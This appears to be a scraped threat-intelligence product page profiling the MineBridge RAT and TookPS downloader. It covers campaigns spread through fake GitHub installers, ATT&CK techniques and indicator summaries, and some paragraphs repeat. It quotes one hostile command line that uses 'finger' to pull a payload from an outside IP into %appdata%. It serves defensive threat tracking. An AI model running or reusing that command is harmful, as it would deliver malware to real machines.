Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Using fraudulent GitHub repositories to distribute malicious batch script installers masquerading as legitimate IT and security software, leading to the deployment of the TookPS downloader, which then initiates a multi-stage infection chain to establish persistent remote access using SSH reverse tunnels and RATs like MineBridge RAT (aka TeviRAT).
Using fraudulent GitHub repositories to distribute malicious batch script installers masquerading as legitimate IT and security software, leading to the deployment of the TookPS downloader, which then initiates a multi-stage infection chain to establish persistent remote access using SSH reverse tunnels and RATs like MineBridge RAT (aka TeviRAT).
Using fraudulent GitHub repositories to distribute malicious batch script installers masquerading as legitimate IT and security software, leading to the deployment of the TookPS downloader, which then initiates a multi-stage infection chain to establish persistent remote access using SSH reverse tunnels and RATs like MineBridge RAT (aka TeviRAT).
24 distinct techniques documented for this family, organized by ATT&CK tactic.
It constructs the following command line and then executes it using Windows Management Instrumentation (WMI).
T1053.005 Scheduled Task/Job: Scheduled Task Creates scheduled task to execute PowerShell commands which further downloads and executes PowerShell scripts
T1059.001 Command and Scripting Interpreter: PowerShell Uses PowerShell in multiple stages to download and execute malicious payloads
It constructs the following command line and then executes it using Windows Management Instrumentation (WMI). Command line: cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr ...
T1053.005 Scheduled Task/Job: Scheduled Task Creates scheduled task to execute PowerShell commands which further downloads and executes PowerShell scripts
The unpacked DLL is a UPX-packed binary of MINEBRIDGE RAT ... T1027.002 Obfuscated Files or Information: Software Packing Payloads are packed in layers
T1036.004 Masquerading: Masquerade Task or Service Scheduled tasks are created with name masquerading Google and OneDrive
Execution flow starts with the binary called defrender.exe, which is masked to appear as a Windows Defender binary ... T1036.005 Masquerading: Match Legitimate Name or Location
The encoded content is decoded using the legitimate Windows utility certutil.exe and executed ... T1140 Deobfuscate/Decode Files or Information Strings and other data are obfuscated in the payloads
If the command-line argument is __START__ then it starts a BITS job to download a zip file-based payload ... Figure 7 shows the relevant code section responsible for using bitsadmin to download the payload.
T1071.001 Application Layer Protocol: Web Protocols Uses https for C&C communication
...establish persistent remote access using SSH reverse tunnels and RATs like MineBridge RAT (aka TeviRAT).
52 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote access trojan used in a multi-stage infection chain to establish persistent remote access, including via SSH reverse tunnels.
Remote access trojan that abuses TeamViewer for DLL side-loading to gain remote access, spy on users, capture TeamViewer credentials, establish persistence, and enable follow-on malware deployment. In this campaign it was distributed via fake trading applications, PowerShell stages, scheduled tasks, and reverse SSH tunnels.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.